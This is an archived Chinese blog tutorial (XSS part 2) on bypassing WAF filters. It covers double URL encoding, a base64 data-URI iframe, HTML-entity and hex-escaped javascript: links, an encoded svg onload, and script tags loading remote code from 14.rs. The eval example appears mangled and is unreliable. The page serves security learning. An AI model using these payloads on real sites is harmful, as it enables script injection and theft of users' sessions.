[18696] 2019-05-30_聊聊XSS漏洞(二)
<html><head>
<title>聊聊XSS漏洞(二)</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0,viewport-fit=cover">
<style>
*{margin:0;padding:0;max-width:100%;box-sizing:border-box;}html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;line-height:1.6}img{z-index:999;position:relative;max-width:100%;margin:10px 0;}body{-webkit-touch-callout:none;font family:-apple-system-font,BlinkMacSystemFont,"Helvetica Neue","PingFang SC","Hiragino Sans GB","Microsoft YaHei UI","Microsoft YaHei",Arial,sans-serif;color:#333;letter-spacing:.034em}h1,h2,h3,h4,h5,h6{font-weight:400;font-size:16px;line-height:36px;}a{color:#576b95;text-decoration:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}td,th{word-wrap:break-word;padding:5px 10px;border:1px solid #DDD;}table{margin-bottom:10px;border-collapse:collapse;display:table;width:100%!important;}.appmsg_skin_default .rich_media_area_primary{background-color:#fff}.appmsg_skin_default .rich_media_area_primary .weui-loadmore_line .weui-loadmore__tips{background-color:#fff}.rich_media_area_primary{padding:20px 16px 12px;background-color:#fafafa}@media (max-width:375px){.rich_media_area_primary{padding:20px 60px 15px 60px}.rich_media_area_extra{padding:0 60px 21px 60px}}@media (min-width:1024px){.rich_media_area_primary_inner,.rich_media_area_extra_inner,body{max-width:677px;margin-left:auto;margin-right:auto}.rich_media_area_primary{padding-top:32px}}.rich_media{padding:20px;}.appmsg_skin_default .rich_media_area_primary{background-color:#fff}.appmsg_skin_default .rich_media_area_primary .weui-loadmore_line .weui-loadmore__tips{background-color:#fff}@media screen and (min-width:1024px){.rich_media_area_primary_inner,.rich_media_area_extra_inner{max-width:677px;margin-left:auto;margin-right:auto}.rich_media_area_primary{padding-top:32px}}.rich_media_content{overflow:hidden;color:#333;font-size:17px;line-height:37px;;word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;hyphens:auto;text-align:justify;position:relative;z-index:0}.rich_media_content *{max-width:100%!important;box-sizing:border-box!important;-webkit-box-sizing:border-box!important;word-wrap:break-word!important}.rich_media_content p{clear:both;min-height:1em}.rich_media_content em{font-style:italic}.rich_media_content fieldset{min-width:0}.rich_media_content .list-paddingleft-1,.rich_media_content .list-paddingleft-2,.rich_media_content .list-paddingleft-3{padding-left:2.2em}.rich_media_content .list-paddingleft-1 .list-paddingleft-2,.rich_media_content .list-paddingleft-2 .list-paddingleft-2,.rich_media_content .list-paddingleft-3 .list-paddingleft-2{padding-left:30px}.rich_media_content .list-paddingleft-1{padding-left:1.2em}.rich_media_content .list-paddingleft-3{padding-left:3.2em}.rich_media_content .code-snippet,.rich_media_content .code-snippet__fix{max-width:1000%!important}.rich_media_content .code-snippet *,.rich_media_content .code-snippet__fix *{max-width:1000%!important}.rich_media_title{font-size:22px;line-height:42px;;line-height:1.4;margin:10px 0;padding-bottom:10px;border-bottom:1px solid #e7e7eb;}@supports(-webkit-overflow-scrolling:touch){.rich_media_title{font-weight:700}}.rich_media_meta{display:inline-block;vertical-align:middle;margin:0 10px 10px 0;font-size:15px;line-height:35px;;line-height:35px;;line-height:35px;;line-height:35px;;-webkit-tap-highlight-color:rgba(0,0,0,0)}.rich_media_meta.icon_appmsg_tag{margin-right:4px}.rich_media_meta.meta_tag_text{margin-right:0}.rich_media_meta_list em{font-style:normal}.rich_media_meta_text{color:rgba(0,0,0,0.3)}p{margin:0;}.msgBox{margin-top:20px;padding-top:20px;padding-left:50px;overflow:hidden;border-top:2px dashed #09a2ff;}.msg{padding-top:7px;clear:both;}.msgBody{float:right;width:100%;margin-left:55px;padding-bottom:15px;border-bottom:1px dashed #e0e0e0;}.userHeadImg{float:left;margin-left:-50px;}.userHeadImg img{width:40px;height:40px;margin-right:10px;border-radius:3px;}.userName{color:#888888;line-height:24px;font-size:14px;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;line-height:34px;;margin:5px 0 5px 0;height:24px;}.replyBody,.autherBody{color:#565656;font-size:15px;}.replyIcon{border-left:4px solid #33ab01;margin-right:5px;}.ad{text-decoration:none;color:#d6d4d4;font-size:12px;line-height:32px;;}.msgBodyReply{padding-top:5px;}.userName span{float:right;color:#afafaf;font-size:14px;}code{text-align:left;font-size:14px;display:block;white-space:pre;display:-webkit-box;display:-webkit-flex;display:flex;position:relative;}.code-snippet__fix{font-size:14px;margin:10px 0;display:block;color:#333;position:relative;background-color:rgba(0,0,0,0.03);border:1px solid #f0f0f0;border-radius:2px;display:-webkit-box;display:-webkit-flex;display:flex;padding-left:25px;line-height:26px}.code-snippet__fix code{text-align:left;font-size:14px;display:block;white-space:pre;display:-webkit-box;display:-webkit-flex;display:flex;position:relative;font family:Consolas,"Liberation Mono",Menlo,Courier,monospace}.code-snippet__comment,.code-snippet__quote{color:#afafaf;font-style:italic}.code-snippet__keyword,.code-snippet__selector-tag,.code-snippet__subst{color:#ca7d37}.code-snippet__number,.code-snippet__literal,.code-snippet__variable,.code-snippet__template-variable,.code-snippet__tag .code-snippet__attr{color:#0e9ce5}.code-snippet__string,.code-snippet__doctag{color:#d14}.code-snippet__title,.code-snippet__section,.code-snippet__selector-id{color:#d14}.code-snippet__subst{font-weight:normal}.code-snippet__type,.code-snippet__class .code-snippet__title{color:#0e9ce5}.code-snippet__tag,.code-snippet__name,.code-snippet__attribute{color:#0e9ce5;font-weight:normal}.code-snippet__regexp,.code-snippet__link{color:#ca7d37}.code-snippet__symbol,.code-snippet__bullet{color:#d14}.code-snippet__built_in,.code-snippet__builtin-name{color:#ca7d37}.code-snippet__meta{color:#afafaf}.code-snippet__deletion{background:#fdd}.code-snippet__addition{background:#dfd}.code-snippet__emphasis{font-style:italic}.code-snippet__strong{font-weight:bold}.account_avatar{width:40px;height:40px;padding:0;}.account_info{display:-webkit-box;display:-webkit-flex;display:flex;-webkit-box-align:center;-webkit-align-items:center;padding:20px 0;align-items:center}.flex_bd{padding-left:14px;}.account_nickname{display:inline-block;vertical-align:middle;line-height:1.2;color:#576b95;font-size:14px}.account_desc{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;-webkit-line-clamp:1;color:rgba(0,0,0,0.3);font-size:14px;line-height:1.2;padding-top:.4em}.msg_source_url{text-align:left;word-break:break-all;margin-top:20px;}.msg_source_url a{padding-right:10px;}.msg_source_url .url_text{color:#a8a8a8;}.video-desc{font-size:14px;margin-top:15px;color:#6c6c6c;}.msg_source_url{text-align:left;}.original_primary_card_tips{color:rgba(0,0,0,0.3);line-height:1.4;font-size:15px;}.weui-flex__item{margin-bottom:20px;padding:20px 16px;margin-top:16px;line-height:1.4;align-items:center;background-color:#f7f7f7;border-radius:8px;position:relative;}.original_primary_desc{color:rgba(0,0,0,0.5);font-size:14px;padding-top:4px;width:auto;overflow:hidden;text-overflow:ellipsis;}.msgBodyReplyList{border-top:1px solid #e1e1e1;margin-top:10px;}.msgBodyReplyListTop{border-top:0;}.reply_like_num{float:right;font-size:14px;color:#c7c7c7;}.msgData{margin-top:20px;color:#626262;}.msgData span{font-size:14px;padding-right:15px;}.msgData .likes{float:right;padding-right:0;}.js_text_content p{font-size:18px;line-height:38px;;}.rich_media_meta_link{font-size:15px;}blockquote {padding-left: 10px;border-left: 3px solid #dbdbdb;color: rgba(0,0,0,0.5);font-size:15px;line-height:35px;;padding-top: 4px;margin: 1em 0;}.video_iframe{width:500px;height:400px;}.blockquote_info{color:#b5b5b5;margin-top:10px;}.playVideoWx{position:relative;display:block;}.icon_mid_play{position:absolute;z-index:9999;top:50%;left:50%;display:-webkit-box;display:-webkit-flex;display:flex;-webkit-box-align:center;-webkit-align-items:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;justify-content:center;width:48px;height:48px;background:rgba(237,237,237,0.9);border-radius:50%}.icon_mid_play:before{content:"";text-indent:-999em;display:inline-block;width:28px;height:28px;vertical-align:middle;background-size:cover;background-image:url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24' viewBox='0 0 24 24'%3E%3Cpath fill='%23151515' fill-rule='evenodd' d='M9.524 4.938l10.092 6.21a1 1 0 0 1 0 1.704l-10.092 6.21A1 1 0 0 1 8 18.21V5.79a1 1 0 0 1 1.524-.852z'/%3E%3C/svg%3E")}
</style>
<link href="https://www.juyifx.cn/config/css/wxArticle.css" rel="stylesheet"/>
</head>
<body>
<div class="rich_media">
<h1 class="rich_media_title" id="activity-name">
聊聊XSS漏洞(二)
</h1>
<div id="meta_content" class="rich_media_meta_list">
<span class="rich_media_meta rich_media_meta_text">
crhua
</span>
<span class="rich_media_meta rich_media_meta_nickname" id="profileBt">
<a href="javascript:void(0);" class=" weui-wa-hotarea" id="js_name">
huasec </a>
<div id="js_profile_qrcode" class="profile_container" style="display:none;">
<div class="profile_inner">
<strong class="profile_nickname">huasec</strong>
<img class="profile_avatar" id="js_profile_qrcode_img" >
<p class="profile_meta">
<label class="profile_meta_label">微信号</label>
<span class="profile_meta_value">ihuahua04</span>
</p>
<p class="profile_meta">
<label class="profile_meta_label">功能介绍</label>
<span class="profile_meta_value">分享一些平时所学,励志成为一名安全研发。</span>
</p>
</div>
<span class="profile_arrow_wrp" id="js_profile_arrow_wrp">
<i class="profile_arrow arrow_out"></i>
<i class="profile_arrow arrow_in"></i>
</span>
</div>
</span>
<em id="publish_time" class="rich_media_meta rich_media_meta_text">2019-05-30</em>
</div>
<div id="js_tags"class="article-tag__list" style="display: none;" data-len="0">
<div class="article-tag-card__title">收录于话题</div>
<div class="article-tags">
</div>
</div><div id="weixin_content"><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" powered-by="xiumi.us" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 10px;padding-left: 10px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><section style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" powered-by="xiumi.us" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 30px;padding-left: 30px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><strong style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;color: rgb(136, 136, 136);font-size:20px;line-height:40px;;box-sizing: border-box !important;word-wrap: break-word !important;">“</span></strong><span style="max-width: 100%;color: rgb(136, 136, 136);box-sizing: border-box !important;word-wrap: break-word !important;"> 接上一篇,聊聊常规bypass方法<strong style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;font-size:20px;line-height:40px;;box-sizing: border-box !important;word-wrap: break-word !important;">”</span></strong></span><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p></section></section></section></section><section style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" powered-by="xiumi.us" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 22px;padding-left: 22px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p></section></section></section></section></section></section></section></section><p><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" powered-by="xiumi.us" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 10px;padding-left: 10px;max-width: 100%;box-sizing: border-box;line-height: 1.6;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">01</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;font-size:20px;line-height:40px;;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;">双url编码<br/></span></span></p><p class="md-end-block md-p md-focus" style="box-sizing: border-box;orphans: 4;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain md-expand" style="box-sizing: border-box;">把<strong>% </strong>url编码成 <strong>%25 </strong>,如果后台对参数有再次进行url decode 或者输出的时候有 url decode 就可以绕过WAF。</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">02</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;font-size:20px;line-height:40px;;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;">base64编码</span></span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><br/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><span style="color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">WAF不拦截 <> ,但拦截 script onXXXX , 用base64 绕过。</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><span style="color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">如:</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">iframe</span> <span class="code-snippet__attr">src</span>=<span class="code-snippet__string">"data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+"</span>></span></span></code></pre></section><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;word-wrap: break-word !important;"><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">03</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">HTML实体编码绕过</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p><span style="color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">实体编码一开始是为了避免譬如在你的双引号中要输入数据中包括双引号导致浏览器把你输入的引号当作上一个引号的姐妹标签而异常闭合而提出的。</span></p><p><span style="color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;">payload:<br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">a</span> <span class="code-snippet__attr">href</span>=<span class="code-snippet__string">'javascript:alert&#40;&#39;123&#39;&#41;'</span>></span>hello<span class="code-snippet__tag"></<span class="code-snippet__name">a</span>></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">a</span> <span class="code-snippet__attr">href</span>=<span class="code-snippet__string">"j&#97;vascript:alert&#0000040;'123'&#41;"</span>></span>hello<span class="code-snippet__tag"></<span class="code-snippet__name">a</span>></span></span></code></pre></section><p><span style="color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;display: inline !important;float: none;"></span></p><p class="md-end-block md-p" style="box-sizing: border-box;orphans: 4;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">tip:</span></p><p class="md-end-block md-p" style="box-sizing: border-box;orphans: 4;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">(1)其实在标签里的伪协议js 代码是可以不用用双引号引起来的。</span></p><p class="md-end-block md-p md-focus" style="box-sizing: border-box;orphans: 4;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">加上eval函数后(eval认识 x十六进制 八进制 u unicode编码)</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">a</span> <span class="code-snippet__attr">href</span>=<span class="code-snippet__string">"j&#97;vascript:eval('&#;u0091x65x72x74x28x22x31x22x29')"</span>></span>hello<span class="code-snippet__tag"></<span class="code-snippet__name">a</span>></span></span></code></pre></section><p class="md-end-block md-p md-focus" style="box-sizing: border-box;orphans: 4;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;"></span>(2)<span class="md-plain md-expand" style="box-sizing: border-box;">如果页面直接显示输入内容,可以先html 编码 再url 编码。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="perl"><code><span class="code-snippet_outer"><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)></span></code></pre></section><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;"><br/></span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">04</span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"></span><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">不带http 的payload</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"><br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">script</span>/<span class="code-snippet__attr">src</span>=<span class="code-snippet__string">ttps://14.rs</span> ></span><span class="code-snippet__tag"></<span class="code-snippet__name">script</span>></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">script</span>/<span class="code-snippet__attr">src</span>=<span class="code-snippet__string">ttp://14.rs</span> ></span><span class="code-snippet__tag"></<span class="code-snippet__name">script</span>></span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">script</span>/<span class="code-snippet__attr">src</span>=<span class="code-snippet__string">//14.rs</span>></span><span class="code-snippet__tag"></<span class="code-snippet__name">script</span>></span></span></code></pre></section><br/><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span 